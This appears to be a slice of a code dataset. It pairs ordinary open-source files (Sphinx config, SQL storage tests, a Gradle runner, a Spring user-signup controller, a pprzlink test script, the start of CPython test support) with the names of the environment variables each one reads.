w = strings.ToLower(w)
stems = append(stems, eng.Stem(w))
}
return stems
}
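// Rough end-to-end sketch of how the helpers above fit together (assumed calling
// code, not present in this package; the sentence is an arbitrary example):
//
//	tokens := TokenizeSentence("Bring Jane flowers tomorrow at 8pm")
//	stems := StemTokens(tokens)
//	ner, _ := buildClassifier()
//	si := ner.classifyTokens(tokens) // Commands, Objects, People and Times in one pass
//	_, _ = stems, si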
|
[
"\"ABOT_ENV\"",
"\"ABOT_PATH\""
] |
[] |
[
"ABOT_ENV",
"ABOT_PATH"
] |
[]
|
["ABOT_ENV", "ABOT_PATH"]
|
go
| 2 | 0 | |
docs/conf.py
|
import datetime
import importlib
import inspect
import sys
import os
year = datetime.datetime.now().strftime('%Y')
sys.path.insert(0, os.path.abspath('..'))
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tests.settings')
import django
django.setup()
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
'sphinx.ext.inheritance_diagram',
'sphinx.ext.intersphinx',
'sphinx.ext.linkcode',
]
def linkcode_resolve(domain, info):
"""Link source code to GitHub."""
project = 'django-dataexporter'
github_user = 'lenarother'
head = 'master'
if domain != 'py' or not info['module']:
return None
filename = info['module'].replace('.', '/')
mod = importlib.import_module(info['module'])
basename = os.path.splitext(mod.__file__)[0]
if basename.endswith('__init__'):
filename += '/__init__'
item = mod
lineno = ''
for piece in info['fullname'].split('.'):
item = getattr(item, piece)
try:
lineno = '#L%d' % inspect.getsourcelines(item)[1]
except (TypeError, IOError):
pass
return ('https://github.com/%s/%s/blob/%s/%s.py%s' %
(github_user, project, head, filename, lineno))
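# For example (the module path is illustrative, not taken from this file),
# linkcode_resolve('py', {'module': 'dataexporter.exporter', 'fullname': 'Exporter'})
# would produce a URL of the form
# https://github.com/lenarother/django-dataexporter/blob/master/dataexporter/exporter.py#L<lineno>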
intersphinx_mapping = {
'python': ('http://docs.python.org/3.6', None),
'django': ('https://docs.djangoproject.com/en/dev/',
'https://docs.djangoproject.com/en/dev/_objects/'),
}
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = 'django-dataexporter'
copyright = '%s, Magdalena Rother' % year
exclude_patterns = ['_build']
pygments_style = 'sphinx'
def skip(app, what, name, obj, skip, options):
if name == '__init__' and obj.__doc__:
return False
return skip
def setup(app):
app.connect('autodoc-skip-member', skip)
autodoc_default_flags = ['members', 'show-inheritance']
autodoc_member_order = 'bysource'
inheritance_graph_attrs = dict(rankdir='TB')
inheritance_node_attrs = dict(shape='rect', fontsize=14, fillcolor='gray90',
color='gray30', style='filled')
inheritance_edge_attrs = dict(penwidth=0.75)
html_theme = 'default'
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
tests/plugins/test_sql.py
|
import os
import pytest
import datetime
import sqlalchemy as sa
from frictionless import Table, Package, Resource, exceptions
from frictionless.plugins.sql import SqlDialect, SqlStorage
from dotenv import load_dotenv
load_dotenv(".env")
# Parser
def test_table_sql(database_url):
dialect = SqlDialect(table="data")
with Table(database_url, dialect=dialect) as table:
assert table.schema == {
"fields": [
{"constraints": {"required": True}, "name": "id", "type": "integer"},
{"name": "name", "type": "string"},
],
"primaryKey": ["id"],
}
assert table.header == ["id", "name"]
assert table.read_data() == [[1, "english"], [2, "中国人"]]
def test_table_sql_order_by(database_url):
dialect = SqlDialect(table="data", order_by="id")
with Table(database_url, dialect=dialect) as table:
assert table.header == ["id", "name"]
assert table.read_data() == [[1, "english"], [2, "中国人"]]
def test_table_sql_order_by_desc(database_url):
dialect = SqlDialect(table="data", order_by="id desc")
with Table(database_url, dialect=dialect) as table:
assert table.header == ["id", "name"]
assert table.read_data() == [[2, "中国人"], [1, "english"]]
def test_table_sql_table_is_required_error(database_url):
table = Table(database_url)
with pytest.raises(exceptions.FrictionlessException) as excinfo:
table.open()
error = excinfo.value.error
assert error.code == "dialect-error"
assert error.note.count("'table' is a required property")
def test_table_sql_headers_false(database_url):
dialect = SqlDialect(table="data")
with Table(database_url, dialect=dialect, headers=False) as table:
assert table.header == []
assert table.read_data() == [["id", "name"], [1, "english"], [2, "中国人"]]
def test_table_sql_write(database_url):
source = "data/table.csv"
dialect = SqlDialect(table="name", order_by="id")
with Table(source) as table:
table.write(database_url, dialect=dialect)
with Table(database_url, dialect=dialect) as table:
assert table.header == ["id", "name"]
assert table.read_data() == [[1, "english"], [2, "中国人"]]
# Storage
def test_storage_types(database_url):
engine = sa.create_engine(database_url)
prefix = "prefix_"
# Export/Import
source = Package("data/storage/types.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata
assert target.get_resource("types").schema == {
"fields": [
{"name": "any", "type": "string"}, # type fallback
{"name": "array", "type": "string"}, # type fallback
{"name": "boolean", "type": "boolean"},
{"name": "date", "type": "date"},
{"name": "date_year", "type": "date"}, # format removal
{"name": "datetime", "type": "datetime"},
{"name": "duration", "type": "string"}, # type fallback
{"name": "geojson", "type": "string"}, # type fallback
{"name": "geopoint", "type": "string"}, # type fallback
{"name": "integer", "type": "integer"},
{"name": "number", "type": "number"},
{"name": "object", "type": "string"}, # type fallback
{"name": "string", "type": "string"},
{"name": "time", "type": "time"},
{"name": "year", "type": "integer"}, # type downgrade
{"name": "yearmonth", "type": "string"}, # type fallback
],
}
# Assert data
assert target.get_resource("types").read_rows() == [
{
"any": "中国人",
"array": '["Mike", "John"]',
"boolean": True,
"date": datetime.date(2015, 1, 1),
"date_year": datetime.date(2015, 1, 1),
"datetime": datetime.datetime(2015, 1, 1, 3, 0),
"duration": "P1Y1M",
"geojson": '{"type": "Point", "coordinates": [33, 33.33]}',
"geopoint": "30,70",
"integer": 1,
"number": 7,
"object": '{"chars": 560}',
"string": "english",
"time": datetime.time(3, 0),
"year": 2015,
"yearmonth": "2015-01",
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
def test_storage_integrity(database_url):
engine = sa.create_engine(database_url)
prefix = "prefix_"
# Export/Import
source = Package("data/storage/integrity.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata (main)
assert target.get_resource("integrity_main").schema == {
"fields": [
# added required
{"name": "id", "type": "integer", "constraints": {"required": True}},
{"name": "parent", "type": "integer"},
{"name": "description", "type": "string"},
],
"primaryKey": ["id"],
"foreignKeys": [
{"fields": ["parent"], "reference": {"resource": "", "fields": ["id"]}}
],
}
# Assert metadata (link)
assert target.get_resource("integrity_link").schema == {
"fields": [
# added required
{"name": "main_id", "type": "integer", "constraints": {"required": True}},
# added required; removed unique
{"name": "some_id", "type": "integer", "constraints": {"required": True}},
# removed unique
{"name": "description", "type": "string"},
],
"primaryKey": ["main_id", "some_id"],
"foreignKeys": [
{
"fields": ["main_id"],
"reference": {"resource": "integrity_main", "fields": ["id"]},
}
],
}
# Assert data (main)
assert target.get_resource("integrity_main").read_rows() == [
{"id": 1, "parent": None, "description": "english"},
{"id": 2, "parent": 1, "description": "中国人"},
]
# Assert data (link)
assert target.get_resource("integrity_link").read_rows() == [
{"main_id": 1, "some_id": 1, "description": "note1"},
{"main_id": 2, "some_id": 2, "description": "note2"},
]
# Cleanup storage
storage.delete_package(target.resource_names)
def test_storage_constraints(database_url):
engine = sa.create_engine(database_url)
prefix = "prefix_"
# Export/Import
source = Package("data/storage/constraints.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata
assert target.get_resource("constraints").schema == {
"fields": [
{"name": "required", "type": "string", "constraints": {"required": True}},
{"name": "minLength", "type": "string"}, # constraint removal
{"name": "maxLength", "type": "string"}, # constraint removal
{"name": "pattern", "type": "string"}, # constraint removal
{"name": "enum", "type": "string"}, # constraint removal
{"name": "minimum", "type": "integer"}, # constraint removal
{"name": "maximum", "type": "integer"}, # constraint removal
],
}
# Assert data
assert target.get_resource("constraints").read_rows() == [
{
"required": "passing",
"minLength": "passing",
"maxLength": "passing",
"pattern": "passing",
"enum": "passing",
"minimum": 5,
"maximum": 5,
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
@pytest.mark.parametrize(
"field_name, cell",
[
("required", ""),
("minLength", "bad"),
("maxLength", "badbadbad"),
("pattern", "bad"),
("enum", "bad"),
("minimum", 3),
("maximum", 9),
],
)
def test_storage_constraints_not_valid_error(database_url, field_name, cell):
engine = sa.create_engine(database_url)
package = Package("data/storage/constraints.json")
resource = package.get_resource("constraints")
# We set an invalid cell to the data property
for index, field in enumerate(resource.schema.fields):
if field.name == field_name:
resource.data[1][index] = cell
# NOTE: should we wrap these exceptions?
with pytest.raises(sa.exc.IntegrityError):
resource.to_sql(engine=engine, force=True)
def test_storage_read_resource_not_existent_error(database_url):
engine = sa.create_engine(database_url)
storage = SqlStorage(engine=engine)
with pytest.raises(exceptions.FrictionlessException) as excinfo:
storage.read_resource("bad")
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("does not exist")
def test_storage_write_resource_existent_error(database_url):
engine = sa.create_engine(database_url)
resource = Resource(path="data/table.csv")
storage = resource.to_sql(engine=engine)
with pytest.raises(exceptions.FrictionlessException) as excinfo:
storage.write_resource(resource)
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("already exists")
# Cleanup storage
storage.delete_package(list(storage))
def test_storage_delete_resource_not_existent_error(database_url):
engine = sa.create_engine(database_url)
storage = SqlStorage(engine=engine)
with pytest.raises(exceptions.FrictionlessException) as excinfo:
storage.delete_resource("bad")
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("does not exist")
def test_storage_views_support(database_url):
engine = sa.create_engine(database_url)
engine.execute("CREATE VIEW data_view AS SELECT * FROM data")
storage = SqlStorage(engine=engine)
resource = storage.read_resource("data_view")
assert resource.schema == {
"fields": [
{"name": "id", "type": "integer"},
{"name": "name", "type": "string"},
]
}
assert resource.read_rows() == [
{"id": 1, "name": "english"},
{"id": 2, "name": "中国人"},
]
# Storage (PostgreSQL)
@pytest.mark.ci
def test_postgresql_storage_types():
engine = sa.create_engine(os.environ["POSTGRESQL_URL"])
prefix = "prefix_"
# Export/Import
source = Package("data/storage/types.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata
assert target.get_resource("types").schema == {
"fields": [
{"name": "any", "type": "string"}, # type fallback
{"name": "array", "type": "object"}, # type downgrade
{"name": "boolean", "type": "boolean"},
{"name": "date", "type": "date"},
{"name": "date_year", "type": "date"}, # format removal
{"name": "datetime", "type": "datetime"},
{"name": "duration", "type": "string"}, # type fallback
{"name": "geojson", "type": "object"}, # type downgrade
{"name": "geopoint", "type": "string"}, # type fallback
{"name": "integer", "type": "integer"},
{"name": "number", "type": "number"},
{"name": "object", "type": "object"},
{"name": "string", "type": "string"},
{"name": "time", "type": "time"},
{"name": "year", "type": "integer"}, # type downgrade
{"name": "yearmonth", "type": "string"}, # type fallback
],
}
# Assert data
assert target.get_resource("types").read_rows() == [
{
"any": "中国人",
"array": None, # TODO: fix array
"boolean": True,
"date": datetime.date(2015, 1, 1),
"date_year": datetime.date(2015, 1, 1),
"datetime": datetime.datetime(2015, 1, 1, 3, 0),
"duration": "P1Y1M",
"geojson": {"type": "Point", "coordinates": [33, 33.33]},
"geopoint": "30,70",
"integer": 1,
"number": 7,
"object": {"chars": 560},
"string": "english",
"time": datetime.time(3, 0),
"year": 2015,
"yearmonth": "2015-01",
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
@pytest.mark.ci
def test_postgresql_storage_integrity():
engine = sa.create_engine(os.environ["POSTGRESQL_URL"])
prefix = "prefix_"
# Export/Import
source = Package("data/storage/integrity.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata (main)
assert target.get_resource("integrity_main").schema == {
"fields": [
# added required
{"name": "id", "type": "integer", "constraints": {"required": True}},
{"name": "parent", "type": "integer"},
{"name": "description", "type": "string"},
],
"primaryKey": ["id"],
"foreignKeys": [
{"fields": ["parent"], "reference": {"resource": "", "fields": ["id"]}}
],
}
# Assert metadata (link)
assert target.get_resource("integrity_link").schema == {
"fields": [
# added required
{"name": "main_id", "type": "integer", "constraints": {"required": True}},
# added required; removed unique
{"name": "some_id", "type": "integer", "constraints": {"required": True}},
# removed unique
{"name": "description", "type": "string"},
],
"primaryKey": ["main_id", "some_id"],
"foreignKeys": [
{
"fields": ["main_id"],
"reference": {"resource": "integrity_main", "fields": ["id"]},
}
],
}
# Assert data (main)
assert target.get_resource("integrity_main").read_rows() == [
{"id": 1, "parent": None, "description": "english"},
{"id": 2, "parent": 1, "description": "中国人"},
]
# Assert data (link)
assert target.get_resource("integrity_link").read_rows() == [
{"main_id": 1, "some_id": 1, "description": "note1"},
{"main_id": 2, "some_id": 2, "description": "note2"},
]
# Cleanup storage
storage.delete_package(target.resource_names)
# TODO: recover enum support
@pytest.mark.ci
@pytest.mark.skip
def test_postgresql_storage_constraints(database_url):
engine = sa.create_engine(os.environ["POSTGRESQL_URL"])
prefix = "prefix_"
# Export/Import
source = Package("data/storage/constraints.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata
assert target.get_resource("constraints").schema == {
"fields": [
{"name": "required", "type": "string", "constraints": {"required": True}},
{"name": "minLength", "type": "string"}, # constraint removal
{"name": "maxLength", "type": "string"}, # constraint removal
{"name": "pattern", "type": "string"}, # constraint removal
{"name": "enum", "type": "string"}, # constraint removal
{"name": "minimum", "type": "integer"}, # constraint removal
{"name": "maximum", "type": "integer"}, # constraint removal
],
}
# Assert data
assert target.get_resource("constraints").read_rows() == [
{
"required": "passing",
"minLength": "passing",
"maxLength": "passing",
"pattern": "passing",
"enum": "passing",
"minimum": 5,
"maximum": 5,
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
@pytest.mark.ci
@pytest.mark.parametrize(
"field_name, cell",
[
("required", ""),
("minLength", "bad"),
("maxLength", "badbadbad"),
("pattern", "bad"),
("enum", "bad"),
("minimum", 3),
("maximum", 9),
],
)
def test_postgresql_storage_constraints_not_valid_error(database_url, field_name, cell):
engine = sa.create_engine(os.environ["POSTGRESQL_URL"])
package = Package("data/storage/constraints.json")
resource = package.get_resource("constraints")
# We set an invalid cell to the data property
for index, field in enumerate(resource.schema.fields):
if field.name == field_name:
resource.data[1][index] = cell
with pytest.raises((sa.exc.IntegrityError, sa.exc.DataError)):
resource.to_sql(engine=engine, force=True)
@pytest.mark.ci
def test_postgresql_storage_views_support():
engine = sa.create_engine(os.environ["POSTGRESQL_URL"])
engine.execute("DROP VIEW IF EXISTS data_view")
engine.execute("DROP TABLE IF EXISTS data")
engine.execute("CREATE TABLE data (id INTEGER PRIMARY KEY, name TEXT)")
engine.execute("INSERT INTO data VALUES (1, 'english'), (2, '中国人')")
engine.execute("CREATE VIEW data_view AS SELECT * FROM data")
storage = SqlStorage(engine=engine)
resource = storage.read_resource("data_view")
assert resource.schema == {
"fields": [
{"name": "id", "type": "integer"},
{"name": "name", "type": "string"},
]
}
assert resource.read_rows() == [
{"id": 1, "name": "english"},
{"id": 2, "name": "中国人"},
]
# Storage (MySQL)
@pytest.mark.ci
def test_mysql_storage_types():
engine = sa.create_engine(os.environ["MYSQL_URL"])
prefix = "prefix_"
# Export/Import
source = Package("data/storage/types.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata
assert target.get_resource("types").schema == {
"fields": [
{"name": "any", "type": "string"}, # type fallback
{"name": "array", "type": "string"}, # type fallback
{"name": "boolean", "type": "integer"}, # type downgrade
{"name": "date", "type": "date"},
{"name": "date_year", "type": "date"}, # format removal
{"name": "datetime", "type": "datetime"},
{"name": "duration", "type": "string"}, # type fallback
{"name": "geojson", "type": "string"}, # type fallback
{"name": "geopoint", "type": "string"}, # type fallback
{"name": "integer", "type": "integer"},
{"name": "number", "type": "number"},
{"name": "object", "type": "string"}, # type fallback
{"name": "string", "type": "string"},
{"name": "time", "type": "time"},
{"name": "year", "type": "integer"}, # type downgrade
{"name": "yearmonth", "type": "string"}, # type fallback
],
}
# Assert data
assert target.get_resource("types").read_rows() == [
{
"any": "中国人",
"array": '["Mike", "John"]',
"boolean": True,
"date": datetime.date(2015, 1, 1),
"date_year": datetime.date(2015, 1, 1),
"datetime": datetime.datetime(2015, 1, 1, 3, 0),
"duration": "P1Y1M",
"geojson": '{"type": "Point", "coordinates": [33, 33.33]}',
"geopoint": "30,70",
"integer": 1,
"number": 7,
"object": '{"chars": 560}',
"string": "english",
"time": datetime.time(3, 0),
"year": 2015,
"yearmonth": "2015-01",
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
# TODO: fix unique for MySQL
@pytest.mark.ci
@pytest.mark.skip
def test_mysql_storage_integrity():
engine = sa.create_engine(os.environ["MYSQL_URL"])
prefix = "prefix_"
# Export/Import
source = Package("data/storage/integrity.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata (main)
assert target.get_resource("integrity_main").schema == {
"fields": [
# added required
{"name": "id", "type": "integer", "constraints": {"required": True}},
{"name": "parent", "type": "integer"},
{"name": "description", "type": "string"},
],
"primaryKey": ["id"],
"foreignKeys": [
{"fields": ["parent"], "reference": {"resource": "", "fields": ["id"]}}
],
}
# Assert metadata (link)
assert target.get_resource("integrity_link").schema == {
"fields": [
# added required
{"name": "main_id", "type": "integer", "constraints": {"required": True}},
# added required; removed unique
{"name": "some_id", "type": "integer", "constraints": {"required": True}},
# removed unique
{"name": "description", "type": "string"},
],
"primaryKey": ["main_id", "some_id"],
"foreignKeys": [
{
"fields": ["main_id"],
"reference": {"resource": "integrity_main", "fields": ["id"]},
}
],
}
# Assert data (main)
assert target.get_resource("main").read_rows() == [
{"id": 1, "parent": None, "description": "english"},
{"id": 2, "parent": 1, "description": "中国人"},
]
# Assert data (link)
assert target.get_resource("link").read_rows() == [
{"main_id": 1, "some_id": 1, "description": "note1"},
{"main_id": 2, "some_id": 2, "description": "note2"},
]
# Cleanup storage
storage.delete_package(target.resource_names)
# TODO: fix enum for MySQL
@pytest.mark.ci
@pytest.mark.skip
def test_mysql_storage_constraints():
engine = sa.create_engine(os.environ["MYSQL_URL"])
prefix = "prefix_"
# Export/Import
source = Package("data/storage/constraints.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata
assert target.get_resource("constraints").schema == {
"fields": [
{"name": "required", "type": "string", "constraints": {"required": True}},
{"name": "minLength", "type": "string"}, # constraint removal
{"name": "maxLength", "type": "string"}, # constraint removal
{"name": "pattern", "type": "string"}, # constraint removal
{"name": "enum", "type": "string"}, # constraint removal
{"name": "minimum", "type": "integer"}, # constraint removal
{"name": "maximum", "type": "integer"}, # constraint removal
],
}
# Assert data
assert target.get_resource("constraints").read_rows() == [
{
"required": "passing",
"minLength": "passing",
"maxLength": "passing",
"pattern": "passing",
"enum": "passing",
"minimum": 5,
"maximum": 5,
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
# TODO: fix constraints for MySQL
@pytest.mark.ci
@pytest.mark.skip
@pytest.mark.parametrize(
"field_name, cell",
[
("required", ""),
("minLength", "bad"),
("maxLength", "badbadbad"),
("pattern", "bad"),
("enum", "bad"),
("minimum", 3),
("maximum", 9),
],
)
def test_mysql_storage_constraints_not_valid_error(field_name, cell):
engine = sa.create_engine(os.environ["MYSQL_URL"])
package = Package("data/storage/constraints.json")
resource = package.get_resource("constraints")
# We set an invalid cell to the data property
for index, field in enumerate(resource.schema.fields):
if field.name == field_name:
resource.data[1][index] = cell
# NOTE: should we wrap these exceptions?
with pytest.raises(sa.exc.IntegrityError):
resource.to_sql(engine=engine, force=True)
@pytest.mark.ci
def test_mysql_storage_views_support():
engine = sa.create_engine(os.environ["MYSQL_URL"])
engine.execute("DROP VIEW IF EXISTS data_view")
engine.execute("DROP TABLE IF EXISTS data")
engine.execute("CREATE TABLE data (id INTEGER PRIMARY KEY, name TEXT)")
engine.execute("INSERT INTO data VALUES (1, 'english'), (2, '中国人')")
engine.execute("CREATE VIEW data_view AS SELECT * FROM data")
storage = SqlStorage(engine=engine)
resource = storage.read_resource("data_view")
assert resource.schema == {
"fields": [
{"name": "id", "type": "integer"},
{"name": "name", "type": "string"},
]
}
assert resource.read_rows() == [
{"id": 1, "name": "english"},
{"id": 2, "name": "中国人"},
]
| environment: [] | variablearg: [] | constarg: ["MYSQL_URL", "POSTGRESQL_URL"] | variableargjson: [] | constargjson: ["MYSQL_URL", "POSTGRESQL_URL"] | lang: python | constargcount: 2 | variableargcount: 0 | sentence: |
ci/fireci/fireci/gradle.py
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import subprocess
import sys
from . import stats
_logger = logging.getLogger('fireci.gradle')
ADB_INSTALL_TIMEOUT = '5'
def P(name, value):
"""Returns name and value in the format of gradle's project property cli argument."""
return '-P{}={}'.format(name, value)
@stats.measure_call('gradle')
def run(*args, gradle_opts='', workdir=None):
"""Invokes gradle with specified args and gradle_opts."""
new_env = dict(os.environ)
if gradle_opts:
new_env['GRADLE_OPTS'] = gradle_opts
new_env['ADB_INSTALL_TIMEOUT'] = ADB_INSTALL_TIMEOUT  # 5 minutes, rather than 2 minutes
stats.propagate_context_into(new_env)
command = ['./gradlew'] + list(args)
_logger.info('Executing gradle command: "%s" in directory: "%s"',
" ".join(command), workdir if workdir else '.')
return subprocess.check_call(
command,
cwd=workdir,
env=new_env,
)
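# Editor's note: a minimal, hypothetical usage sketch of the helpers above.
# The task and property names are invented for illustration; P() only formats
# a Gradle project-property flag and run() shells out to ./gradlew in workdir.
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    # equivalent to: ./gradlew -PprojectsToPublish=firebase-common assemble
    run('assemble', P('projectsToPublish', 'firebase-common'), workdir='.')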
| environment: [] | variablearg: [] | constarg: [] | variableargjson: [] | constargjson: [] | lang: python | constargcount: 0 | variableargcount: 0 | sentence: |
src/main/java/com/lambdaschool/backend/controllers/OpenController.java
|
package com.lambdaschool.backend.controllers;
import com.lambdaschool.backend.models.User;
import com.lambdaschool.backend.models.UserMinimum;
import com.lambdaschool.backend.models.UserRoles;
import com.lambdaschool.backend.services.RoleService;
import com.lambdaschool.backend.services.UserService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.HttpEntity;
import org.springframework.http.HttpHeaders;
import org.springframework.http.HttpStatus;
import org.springframework.http.MediaType;
import org.springframework.http.ResponseEntity;
import org.springframework.util.LinkedMultiValueMap;
import org.springframework.util.MultiValueMap;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.client.RestTemplate;
import org.springframework.web.servlet.support.ServletUriComponentsBuilder;
import springfox.documentation.annotations.ApiIgnore;
import javax.servlet.http.HttpServletRequest;
import javax.validation.Valid;
import java.net.URI;
import java.net.URISyntaxException;
import java.util.ArrayList;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
/**
* The class allows access to endpoints that are open to all users regardless of authentication status.
* Its most important function is to allow a person to create their own username
*/
@RestController
public class OpenController
{
/**
* A method in this controller adds a new user to the application, so it needs access to User Services to do this.
*/
@Autowired
private UserService userService;
/**
* A method in this controller adds a new user to the application with the role User, so it needs access to Role Services to do this.
*/
@Autowired
private RoleService roleService;
/**
* This endpoint allows anyone to create an account with the default role of USER. That role is hardcoded in this method.
*
* @param httpServletRequest the request that comes in for creating the new user
* @param newminuser A special minimum set of data that is needed to create a new user
* @return The access token and other data relevant to token access. Status of CREATED. The location header to look up the new user.
* @throws URISyntaxException we create some URIs during this method. If anything goes wrong with that creation, an exception is thrown.
*/
@PostMapping(value = "/createnewuser",
consumes = {"application/json"},
produces = {"application/json"})
public ResponseEntity<?> addSelf(
HttpServletRequest httpServletRequest,
@Valid
@RequestBody
UserMinimum newminuser)
throws
URISyntaxException
{
// Create the user
User newuser = new User();
newuser.setUsername(newminuser.getUsername());
newuser.setPassword(newminuser.getPassword());
newuser.setPrimaryemail(newminuser.getPrimaryemail());
// add the default role of user
Set<UserRoles> newRoles = new HashSet<>();
newRoles.add(new UserRoles(newuser,
roleService.findByName("user")));
newuser.setRoles(newRoles);
newuser = userService.save(newuser);
// set the location header for the newly created resource
// The location comes from a different controller!
HttpHeaders responseHeaders = new HttpHeaders();
URI newUserURI = ServletUriComponentsBuilder.fromUriString(httpServletRequest.getServerName() + ":" + httpServletRequest.getLocalPort() + "/users/user/{userId}")
.buildAndExpand(newuser.getUserid())
.toUri();
responseHeaders.setLocation(newUserURI);
// return the access token
// To get the access token, surf to the endpoint /login just as if a client had done this.
RestTemplate restTemplate = new RestTemplate();
String requestURI = "http://" + httpServletRequest.getServerName() +
(httpServletRequest.getServerName().equalsIgnoreCase("localhost") ? ":" + httpServletRequest.getLocalPort() : "") +
"/login";
List<MediaType> acceptableMediaTypes = new ArrayList<>();
acceptableMediaTypes.add(MediaType.APPLICATION_JSON);
HttpHeaders headers = new HttpHeaders();
headers.setContentType(MediaType.APPLICATION_FORM_URLENCODED);
headers.setAccept(acceptableMediaTypes);
headers.setBasicAuth(System.getenv("OAUTHCLIENTID"),
System.getenv("OAUTHCLIENTSECRET"));
MultiValueMap<String, String> map = new LinkedMultiValueMap<>();
map.add("grant_type",
"password");
map.add("scope",
"read write trust");
map.add("username",
newminuser.getUsername());
map.add("password",
newminuser.getPassword());
HttpEntity<MultiValueMap<String, String>> request = new HttpEntity<>(map,
headers);
String theToken = restTemplate.postForObject(requestURI,
request,
String.class);
return new ResponseEntity<>(theToken,
responseHeaders,
HttpStatus.CREATED);
}
/**
* Prevents no favicon.ico warning from appearing in the logs. @ApiIgnore tells Swagger to ignore documenting this as an endpoint.
*/
@ApiIgnore
@GetMapping("favicon.ico")
public void returnNoFavicon()
{
}
}
| environment: ["\"OAUTHCLIENTID\"", "\"OAUTHCLIENTSECRET\""] | variablearg: [] | constarg: ["OAUTHCLIENTID", "OAUTHCLIENTSECRET"] | variableargjson: [] | constargjson: ["OAUTHCLIENTID", "OAUTHCLIENTSECRET"] | lang: java | constargcount: 2 | variableargcount: 0 | sentence: |
tests/pprzlink01.py
|
#! /usr/bin/python3
import os
import sys
import argparse
import time
import signal
from ivy.std_api import *
import logging
PPRZ_HOME = os.getenv("PAPARAZZI_HOME", os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../../')))
sys.path.append(PPRZ_HOME + "/var/lib/python")
from pprzlink.ivy import IvyMessagesInterface
from pprzlink.message import PprzMessage
from pprzlink import messages_xml_map
try:
msgs = messages_xml_map.get_msgs('test')
except Exception as e:
print(e)
dico = messages_xml_map.message_dictionary
for msg_type in dico.keys():
for msg in dico[msg_type]:
print(msg_type, ":", msg)
ac_id = 24
ivyInterface = IvyMessagesInterface()
time.sleep(0.5)
world = None
uavid = None
def callback01(ac_id, msg, request_id):
print(request_id, msg)
def callback02(ac_id, msg):
print(msg)
ivyInterface.subscribe(callback01, '(.* WORLD_ENV_REQ .*)')
ivyInterface.subscribe(callback02, '(.* GPS .*)')
signal.signal(signal.SIGINT, lambda sig, frame: ivyInterface.stop())
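# Editor's note (hypothetical sketch): as written, the script registers its
# subscriptions and SIGINT handler and then reaches end-of-file.  To actually
# observe incoming GPS / WORLD_ENV_REQ messages the process has to stay alive,
# for example with a simple keep-alive loop; Ctrl+C then invokes the SIGINT
# handler registered above, which stops the Ivy interface.
if __name__ == '__main__':
    while True:
        time.sleep(1)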
| environment: [] | variablearg: [] | constarg: ["PAPARAZZI_HOME"] | variableargjson: [] | constargjson: ["PAPARAZZI_HOME"] | lang: python | constargcount: 1 | variableargcount: 0 | sentence: |
Lib/test/support/__init__.py
|
"""Supporting definitions for the Python regression tests."""
if __name__ != 'test.support':
raise ImportError('support must be imported from the test package')
import asyncio.events
import collections.abc
import contextlib
import datetime
import errno
import faulthandler
import fnmatch
import functools
import gc
import importlib
import importlib.util
import io
import logging.handlers
import nntplib
import os
import platform
import re
import shutil
import socket
import stat
import struct
import subprocess
import sys
import sysconfig
import tempfile
import _thread
import threading
import time
import types
import unittest
import urllib.error
import warnings
from .testresult import get_test_runner
try:
import multiprocessing.process
except ImportError:
multiprocessing = None
try:
import zlib
except ImportError:
zlib = None
try:
import gzip
except ImportError:
gzip = None
try:
import bz2
except ImportError:
bz2 = None
try:
import lzma
except ImportError:
lzma = None
try:
import resource
except ImportError:
resource = None
__all__ = [
# globals
"PIPE_MAX_SIZE", "verbose", "max_memuse", "use_resources", "failfast",
# exceptions
"Error", "TestFailed", "ResourceDenied",
# imports
"import_module", "import_fresh_module", "CleanImport",
# modules
"unload", "forget",
# io
"record_original_stdout", "get_original_stdout", "captured_stdout",
"captured_stdin", "captured_stderr",
# filesystem
"TESTFN", "SAVEDCWD", "unlink", "rmtree", "temp_cwd", "findfile",
"create_empty_file", "can_symlink", "fs_is_case_insensitive",
# unittest
"is_resource_enabled", "requires", "requires_freebsd_version",
"requires_linux_version", "requires_mac_ver", "check_syntax_error",
"TransientResource", "time_out", "socket_peer_reset", "ioerror_peer_reset",
